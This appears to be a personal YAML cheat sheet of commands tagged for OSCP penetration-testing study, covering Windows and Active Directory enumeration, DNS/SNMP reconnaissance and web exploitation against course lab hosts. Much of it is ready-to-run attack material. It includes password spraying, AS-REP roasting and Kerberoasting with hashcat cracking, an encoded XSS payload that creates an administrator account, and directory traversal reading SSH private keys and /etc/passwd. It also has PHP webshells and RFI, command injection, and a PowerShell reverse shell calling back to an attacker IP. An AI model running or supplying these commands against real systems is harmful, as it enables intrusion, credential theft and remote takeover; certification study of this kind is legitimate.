||
lang: ps1
|
||
tags: OSCP
|
||
desc: recusrive grep
|
||
- cmd: net user steve
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: Get info about account
|
||
- cmd: Get-History
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: Get powershell history commands
|
||
- cmd: Clear-History
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: Clear powershell history commands
|
||
- cmd: (Get-PSReadlineOption).HistorySavePath
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: Display path of the history file from PSReadline (then type <filename> to read)
|
||
- cmd: eventvwr
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: Launch event viewer
|
||
- cmd: Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: List of services with binary path
|
||
- cmd: Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: Obtain Startup Type for mysql service
|
||
- cmd: whoami /priv
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: Checking for reboot privileges
|
||
- cmd: shutdown /r /t 0
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: Reboot
|
||
- cmd: Restart-Service BetaService
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: Restarting BetaService
|
||
- cmd: $env:path
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: Display the PATH environment variable
|
||
- cmd: Get-CimInstance -ClassName win32_service | Select Name,State,PathName
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: List of services with binary path
|
||
- cmd: wmic service get name,pathname | findstr .. (look in courses)
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: List of services with spaces and missing quotes in the binary path
|
||
- cmd: schtasks /query /fo LIST /v
|
||
lang: ps1
|
||
tags: OSCP
|
||
desc: list scheduled tasks
|
||
- cmd: vim --clean
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: launch vim without options and config files
|
||
- cmd: git --git-dir=~/fms/.git --work-tree=~/fms pull
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: git command (pull) with directory as params
|
||
- cmd: pandoc -f epub -t markdown_strict -o hacktricks.md hacktricks.epub
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: convert files from format to another, here epub to markdown
|
||
- cmd: grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}"
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: grep ip address
|
||
- cmd: grep -E -o "[[:alnum:]]{30,34}"
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: grep NTLM hash
|
||
- cmd: mitmproxy --set console_mouse=false --set anticache -p 8080
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: launch mitmproxy with options
|
||
- cmd: mitmproxy --set console_mouse=false --set anticache -p 8080 -s ~/hs/mitmproxy/req_hook.py
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: launch mitmproxy with options and hook
|
||
- cmd: mitmproxy --set console_mouse=false --set anticache -p 8080 --mode upstream:http://127.0.0.1:8888
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: launch mitmproxy with upstream proxy
|
||
- cmd: find / -xdev -type f \( -exec grep -xq "{}" /var/lib/dpkg/info/*.list \; -or -print \)
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: search for files not owned by any package
|
||
- cmd: secret-tool search key password
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: search password saved in gnome keyring
|
||
- cmd: Set-WinUserLanguageList -Force 'fr-FR'
|
||
lang: ps1
|
||
tags: COMMON powershell winsetup
|
||
desc: change Keyboard Layout in French
|
||
- cmd: Test-NetConnection -Port 445 192.168.50.151
|
||
lang: ps1
|
||
tags: OSCP powershell
|
||
desc: Check for TCP port open
|
||
- cmd: 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.50.151", $_)) "TCP port $_ is open"} 2>$null
|
||
lang: ps1
|
||
tags: OSCP powershell
|
||
desc: TCP scan port
|
||
- cmd: 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).ConnectAsync("192.168.50.151", $_).Wait(100)) "TCP port $_ is open"} 2>$null
|
||
lang: ps1
|
||
tags: OSCP powershell
|
||
desc: TCP scan port display only open
|
||
- cmd: '(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell'
|
||
lang: ps1
|
||
tags: OSCP powershell windows cmd.exe
|
||
desc: check the current shell
|
||
- cmd: powershell wget -Uri http://192.168.118.4/plink.exe -OutFile C:\Windows\Temp\plink.exe
|
||
lang: ps1
|
||
tags: OSCP powershell windows cmd.exe
|
||
desc: download a file
|
||
- cmd: net view \\dc01 /all
|
||
lang: ps1
|
||
tags: OSCP windows cmd.exe
|
||
desc: Show SMB share
|
||
- cmd: ls -l /usr/share/metasploit-framework/scripts/resource
|
||
lang: sh
|
||
tags: OSCP
|
||
desc: list Meterpreter autoscript examples
|
||
- cmd: net user jeffadmin /domain
|
||
lang: ps1
|
||
tags: OSCP powershell windows cmd.exe
|
||
desc: get information about a user and domain
|
||
- cmd: net group /domain
|
||
lang: ps1
|
||
tags: OSCP powershell windows cmd.exe
|
||
desc: output includes a long list of groups in the domain
|
||
- cmd: net group "sales department" /domain
|
||
lang: ps1
|
||
tags: oscp powershell windows cmd.exe
|
||
desc: enumerate the group members
|
||
- cmd: cd c:\Tools
|
||
lang: ps1
|
||
tags: oscp powershell windows winsetup
|
||
desc: go to tools directory
|
||
- cmd: Import-Module .\PowerView.ps1
|
||
lang: ps1
|
||
tags: oscp powershell windows winsetup
|
||
desc: import the module PowerView
|
||
- cmd: Import-Module .\Sharphound.ps1
|
||
lang: ps1
|
||
tags: oscp powershell windows winsetup
|
||
desc: import the module SharpHound
|
||
- cmd: Get-NetDomain
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: get basic information about the domain
|
||
- cmd: Get-NetUser
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: get a list of all users in the domain
|
||
- cmd: Get-NetUser | select cn,pwdlastset,lastlogon
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: get a list of all users in the domain and pipe output to select only attributes
|
||
- cmd: Get-NetGroup | select cn
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: enumerate groups and pipe output to select only attributes
|
||
- cmd: Get-NetGroup "Sales Department" | select member
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: investigate the Sales Department using Get-NetGroup and pipe the output into select member
|
||
- cmd: Get-NetComputer
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: enumerate the computer objects in the domain
|
||
- cmd: Get-NetComputer | select operatingsystem,dnshostname
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: enumerate the computer objects in the domain and list operating system and hostnames
|
||
- cmd: Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: enumerate the computer objects with OS version
|
||
- cmd: Find-LocalAdminAccess
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: Scanning domain to find local administrative privileges for our user
|
||
- cmd: Get-NetSession -ComputerName files04 -Verbose
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: Checking logged on users
|
||
- cmd: Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl
|
||
lang: ps1
|
||
tags: oscp powershell windows
|
||
desc: Displaying permissions on the DefaultSecurity registry hive
|
||
- cmd: .\PsLoggedon.exe \\files04
|
||
lang: ps1
|
||
tags: oscp powershell windows
|
||
desc: PsLoggedOn to see user logons at Files04
|
||
- cmd: setspn -L iis_service
|
||
lang: ps1
|
||
tags: oscp powershell windows
|
||
desc: Listing SPN linked to a certain user account
|
||
- cmd: Get-NetUser -SPN | select samaccountname,serviceprincipalname
|
||
lang: ps1
|
||
tags: oscp powershell windows
|
||
desc: Listing the SPN accounts in the domain
|
||
- cmd: nslookup.exe web04.corp.com
|
||
lang: ps1
|
||
tags: oscp powershell windows
|
||
desc: Resolving the web04.corp.com name
|
||
- cmd: Get-ObjectAcl -Identity stephanie
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: Running Get-ObjectAcl specifying our user
|
||
- cmd: Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: Converting the ObjectISD into name
|
||
- cmd: 'Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights'
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: Enumerating ACLs for the Management Group
|
||
- cmd: '"S-1-5-21-1987370270-658905905-1781884369-512","S-1-5-21-1987370270-658905905-1781884369-1104" | Convert-SidToName'
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: Converting all SIDs that have GenericAll permission on the Management Group
|
||
- cmd: net group "Management Department" stephanie /add /domain
|
||
lang: ps1
|
||
tags: oscp powershell windows
|
||
desc: Using "net.exe" to add ourselves to domain group
|
||
- cmd: Get-NetGroup "Management Department" | select member
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: Running "Get-NetGroup" to enumerate "Management Department"
|
||
- cmd: net group "Management Department" stephanie /del /domain
|
||
lang: ps1
|
||
tags: oscp powershell windows
|
||
desc: Using "net.exe" to remove ourselves from domain group
|
||
- cmd: Find-DomainShare
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: Domain Share Query
|
||
- cmd: ls \\dc1.corp.com\sysvol\corp.com\
|
||
lang: ps1
|
||
tags: oscp powershell windows
|
||
desc: Listing contents of the SYSVOL share
|
||
- cmd: ls \\dc1.corp.com\sysvol\corp.com\Policies\
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: Listing contents of the "SYSVOL\policies share"
|
||
- cmd: gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: Using gpp-decrypt to decrypt the password GPP Group Policy Preferences
|
||
- cmd: Get-Help Invoke-BloodHound
|
||
lang: ps1
|
||
tags: oscp powershell windows BloodHound
|
||
desc: Checking the SharpHound options
|
||
- cmd: Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\stephanie\Desktop\ -OutputPrefix "corp audit" -prettyprint
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: Running SharpHound to collect domain data
|
||
- cmd: sudo neo4j start
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Starting the Neo4j service in Kali Linux
|
||
- cmd: bloodhound
|
||
lang: ps1
|
||
tags: oscp sh
|
||
desc: Starting BloodHound in Kali Linux
|
||
- cmd: Find-InterestingDomainAcl -ResolveGUIDs
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: Search for interesting ACEs
|
||
- cmd: Get-DomaiObjectAcl -Identity <AccountName> -ResolveGUIDs
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: Returns the ACLs associated with the specified account
|
||
- cmd: Get-PathAcl -Path \\Path\Of\A\Share
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: Check the ACLs associated with a specified path (e.g smb share)
|
||
- cmd: Invoke-UserHunter -CheckAccess
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: Get members from Domain Admins (default) and a list of computers and check if any of the users is logged
|
||
- cmd: .\Spray-Passwords.ps1 -Pass Nexus123! -Admin
|
||
lang: ps1
|
||
tags: oscp powershell windows PowerView
|
||
desc: Using Spray-Passwords to attack user accounts
|
||
- cmd: crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using crackmapexec to attack user accounts
|
||
- cmd: crackmapexec smb 192.168.56.30 --users
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using crackmapexec to enumerates user on DC
|
||
- cmd: crackmapexec smb 192.168.50.75 -u dave -p 'Flowers1' -d corp.com
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Crackmapexec output indicating that the valid credentials have administrative privileges on the target
|
||
- cmd: crackmapexec winrm 10.10.77.148 -u users -H ntml_hashs --continue-on-success
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Crackmapexec bruteforce winrm using ntmlm hash
|
||
- cmd: .\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!"
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using kerbrute to attack user accounts
|
||
- cmd: for i in 70 74 76 75 72 73; do crackmapexec smb 192.168.247.$i -u pete -p 'Nexus123!' -d corp.com;echo; done
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Spray the credentials of pete against all domain joined machines with crackmapexec
|
||
- cmd: impacket-GetNPUsers -dc-ip 192.168.247.70 -request -outputfile hashes.asreproast corp.com/pete
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using GetNPUsers to perform AS-REP roasting
|
||
- cmd: impacket-GetNPUsers -dc-ip 192.168.56.30 -no-pass -usersfile users.txt minilab/
|
||
lang: sh
|
||
tags: oscp
|
||
desc: try asreproasting on all the users
|
||
- cmd: sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Cracking the AS-REP hash with Hashcat
|
||
- cmd: .\Rubeus.exe asreproast /nowrap
|
||
lang: ps1
|
||
tags: oscp powershell windows
|
||
desc: Using Rubeus to obtain the AS-REP hash of dave
|
||
- cmd: .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Utilizing Rubeus to perform a Kerberoast attack (TGS-REP)
|
||
- cmd: sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Cracking the TGS-REP hash
|
||
- cmd: sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using impacket-GetUserSPNs to perform Kerberoasting on Linux (TGS-REP)
|
||
- cmd: impacket-GetUserSPNs -request -dc-ip 192.168.56.30 mini.lab/carol:123456789
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using impacket-GetUserSPNs to perform Kerberoasting on Linux (TGS-REP)
|
||
- cmd: sudo hashcat -m XXX ./hashs.file /usr/share/wordlists/rockyou.txt -j '$1' --force
|
||
lang: sh
|
||
tags: oscp
|
||
desc: crack using rockyou and use a custom rule (here append 1 to password to match like secret1)
|
||
- cmd: whois megacorpone.com -h 192.168.50.251
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using whois on megacorpone.com
|
||
- cmd: whois 38.100.193.70 -h 192.168.50.251
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Whois reverse lookup
|
||
- cmd: host www.megacorpone.com
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using host to find the A host record for
|
||
- cmd: host -t mx megacorpone.com
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using host to find the MX records for
|
||
- cmd: host -t txt megacorpone.com
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using host to find the TXT records for
|
||
- cmd: host idontexist.megacorpone.com
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using host to search for an invalid host
|
||
- cmd: for ip in $(cat list.txt); do host $ip.megacorpone.com; done
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using Bash to brute force forward DNS
|
||
- cmd: for ip in $(seq 200 254); do host 51.222.169.$ip; done | grep -v "not found"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using Bash to brute force reverse DNS
|
||
- cmd: dnsrecon -d megacorpone.com -t std
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using dnsrecon to perform a standard
|
||
- cmd: dnsrecon -d megacorpone.com -D ~/list.txt -t brt
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Brute forcing hostnames using dnsrecon
|
||
- cmd: dnsenum megacorpone.com
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using dnsenum to automate DNS enumeration
|
||
- cmd: nslookup mail.megacorptwo.com
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using nslookup to perform a simple host enumeration
|
||
- cmd: nslookup -type=TXT info.megacorptwo.com 192.168.50.151
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using nslookup to perform a more specific query
|
||
- cmd: nc -nvv -w 1 -z 192.168.50.152 3388-3390
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using netcat to perform a TCP port scan
|
||
- cmd: nc -nv -u -z -w 1 192.168.50.149 120-123
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using Netcat to perform a UDP port scan
|
||
- cmd: Test-NetConnection -Port 445 192.168.50.151
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Port scanning SMB via PowerShell
|
||
- cmd: 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.50.151", $_)) "TCP port $_ is open"} 2>$null
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Automating the PowerShell portscanning
|
||
- cmd: sudo nbtscan -r 192.168.50.0/24
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using nbtscan to collect additional NetBIOS
|
||
- cmd: net view \\dc01 /all
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Running 'net view' to list remote shares
|
||
- cmd: Test-NetConnection -Port 25 192.168.50.8
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Port scanning SMB via PowerShell
|
||
- cmd: dism /online /Enable-Feature /FeatureName:TelnetClient
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Installing the Telnet client
|
||
- cmd: telnet 192.168.50.8 25
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Interacting with the SMTP service via Telnet on Windows
|
||
- cmd: for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips ; onesixtyone -c community -i ips
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using onesixtyone to brute force
|
||
- cmd: snmpwalk -c public -v1 -t 10 192.168.50.151
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using snmpwalk to enumerate the entire MIB
|
||
- cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.4.1.77.1.2.25
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using snmpwalk to enumerate Windows users
|
||
- cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.4.2.1.2
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using snmpwalk to enumerate Windows
|
||
- cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.6.3.1.2
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using snmpwalk to enumerate
|
||
- cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.6.13.1.3
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using snmpwalk to enumerate open TCP ports
|
||
- cmd: gobuster dir -u 192.168.50.20 -w /usr/share/wordlists/dirb/common.txt -t 5
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Running Gobuster
|
||
- cmd: cat /etc/hosts
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Setting up our /etc/hosts file for offsecwp
|
||
- cmd: cat /usr/share/wordlists/rockyou.txt | head
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Copying the first 10 rockyou wordlist values
|
||
- cmd: curl https://www.google.com/robots.txt
|
||
lang: sh
|
||
tags: oscp
|
||
desc: https://www.google.com/robots.txt
|
||
- cmd: gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Bruteforcing API Paths
|
||
- cmd: curl -i http://192.168.50.16:5002/users/v1
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Obtaining Users' Information
|
||
- cmd: gobuster dir -u http://192.168.50.16:5002/users/v1/admin/ -w /usr/share/wordlists/dirb/small.txt
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Discovering extra APIs
|
||
- cmd: curl -i http://192.168.50.16:5002/users/v1/admin/password
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Discovering API unsupported methods
|
||
- cmd: curl -i http://192.168.50.16:5002/users/v1/login
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Inspecting the login API
|
||
- cmd: curl -i http://offsecwp --user-agent "<script>eval(String.fromCharCode(118,97,114,32,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,44,114,101,113,117,101,115,116,85,82,76,61,34,47,119,112,45,97,100,109,105,110,47,117,115,101,114,45,110,101,119,46,112,104,112,34,44,110,111,110,99,101,82,101,103,101,120,61,47,115,101,114,34,32,118,97,108,117,101,61,34,40,91,94,34,93,42,63,41,34,47,103,59,97,106,97,120,82,101,113,117,101,115,116,46,111,112,101,110,40,34,71,69,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,49,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,41,59,118,97,114,32,110,111,110,99,101,77,97,116,99,104,61,110,111,110,99,101,82,101,103,101,120,46,101,120,101,99,40,97,106,97,120,82,101,113,117,101,115,116,46,114,101,115,112,111,110,115,101,84,101,120,116,41,44,110,111,110,99,101,61,110,111,110,99,101,77,97,116,99,104,91,49,93,44,112,97,114,97,109,115,61,34,97,99,116,105,111,110,61,99,114,101,97,116,101,117,115,101,114,38,95,119,112,110,111,110,99,101,95,99,114,101,97,116,101,45,117,115,101,114,61,34,43,110,111,110,99,101,43,34,38,117,115,101,114,95,108,111,103,105,110,61,97,116,116,97,99,107,101,114,38,101,109,97,105,108,61,97,116,116,97,99,107,101,114,64,111,102,102,115,101,99,46,99,111,109,38,112,97,115,115,49,61,97,116,116,97,99,107,101,114,112,97,115,115,38,112,97,115,115,50,61,97,116,116,97,99,107,101,114,112,97,115,115,38,114,111,108,101,61,97,100,109,105,110,105,115,116,114,97,116,111,114,34,59,40,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,41,46,111,112,101,110,40,34,80,79,83,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,48,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,112,97,114,97,109,115,41,59))</script>" --proxy 127.0.0.1:8080
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Launching the Final XSS Attack through Curl
|
||
- cmd: pwd ; ls / ; cat /etc/passwd
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Display content of /etc/passwd with an absolute path
|
||
- cmd: curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa
|
||
lang: sh
|
||
tags: oscp
|
||
desc: SSH Private Key via curl
|
||
- cmd: ssh -i dt_key -p 2222 offsec@mountaindesserts.com ; yes ; chmod 400 dt_key ; ssh -i dt_key -p 2222 offsec@mountaindesserts.com
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using the Private Key to connect via SSH
|
||
- cmd: curl http://192.168.50.16/cgi-bin/../../../../etc/passwd ; curl http://192.168.50.16/cgi-bin/../../../../../../../../../../etc/passwd
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using "../" to leverage the Directory Traversal vulnerability in Apache 2.4.49
|
||
- cmd: curl http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using encoded dots for Directory Traversal
|
||
- cmd: curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Log entry of Apache's access.log
|
||
- cmd: curl http://mountaindesserts.com/meteor/index.php?page=admin.php
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Contents of the admin.php file
|
||
- cmd: curl http://mountaindesserts.com/meteor/index.php?page=php://filter/resource=admin.php
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Usage of "php://filter" to include unencoded admin.php
|
||
- cmd: curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Usage of "php://filter" to include base64 encoded admin.php
|
||
- cmd: echo "PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJVVEYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+CiAgICA8dGl0bGU+TWFpbnRlbmFuY2U8L3RpdGxlPgo8L2hlYWQ+Cjxib2R5PgogICAgICAgIDw/cGhwIGVjaG8gJzxzcGFuIHN0eWxlPSJjb2xvcjojRjAwO3RleHQtYWxpZ246Y2VudGVyOyI+VGhlIGFkbWluIHBhZ2UgaXMgY3VycmVudGx5IHVuZGVyIG1haW50ZW5hbmNlLic7ID8+Cgo8P3BocAokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOwokdXNlcm5hbWUgPSAicm9vdCI7CiRwYXNzd29yZCA9ICJNMDBuSzRrZUNhcmQhMiMiOwoKLy8gQ3JlYXRlIGNvbm5lY3Rpb24KJGNvbm4gPSBuZXcgbXlzcWxpKCRzZXJ2ZXJuYW1lLCAkdXNlcm5hbWUsICRwYXNzd29yZCk7CgovLyBDaGVjayBjb25uZWN0aW9uCmlmICgkY29ubi0+Y29ubmVjdF9lcnJvcikgewogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiAkY29ubi0+Y29ubmVjdF9lcnJvcik7Cn0KZWNobyAiQ29ubmVjdGVkIHN1Y2Nlc3NmdWxseSI7Cj8+Cgo8L2JvZHk+CjwvaHRtbD4K" | base64 -d
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Decoding the base64 encoded content of admin.php
|
||
- cmd: curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Usage of the "data://" wrapper to execute ls
|
||
- cmd: echo -n '<?php echo system($_GET["cmd"]);?>' | base64 ; curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Usage of the "data://" wrapper with base64 encoded data
|
||
- cmd: curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Exploiting RFI with a PHP backdoor and execution of ls
|
||
- cmd: curl http://192.168.50.189/meteor/uploads/simple-backdoor.pHP?cmd=dir
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Execution of dir command in the uploaded webshell
|
||
- cmd: pwsh ; $Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' ; $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text) ; $EncodedText =[Convert]::ToBase64String($Bytes) ; $EncodedText ; exit
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Encoding the oneliner in PowerShell on Linux
|
||
- cmd: ls -la /usr/share/webshells
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing of the webshells directory on Kali
|
||
- cmd: curl http://mountaindesserts.com:8000/index.php ; curl http://mountaindesserts.com:8000/meteor/index.php ; curl http://mountaindesserts.com:8000/admin.php
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Failed attempts to access PHP files
|
||
- cmd: ssh-keygen ; fileup ; cat fileup.pub > authorized_keys
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Prepare authorized_keys file for File Upload
|
||
- cmd: ssh -o PubkeyAcceptedAlgorithms=ssh-rsa -o HostKeyAlgorithms=ssh-rsa user@192.168.195.245
|
||
lang: sh
|
||
tags: oscp
|
||
desc: connect on old SSH server
|
||
- cmd: rm ~/.ssh/known_hosts ; ssh -p 2222 -i fileup root@mountaindesserts.com ; yes
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using the SSH key to successufully connect via SSH as the root user
|
||
- cmd: curl -X POST --data 'Archive=ipconfig' http://192.168.50.189:8000/archive
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Detected Command Injection for ipconfig
|
||
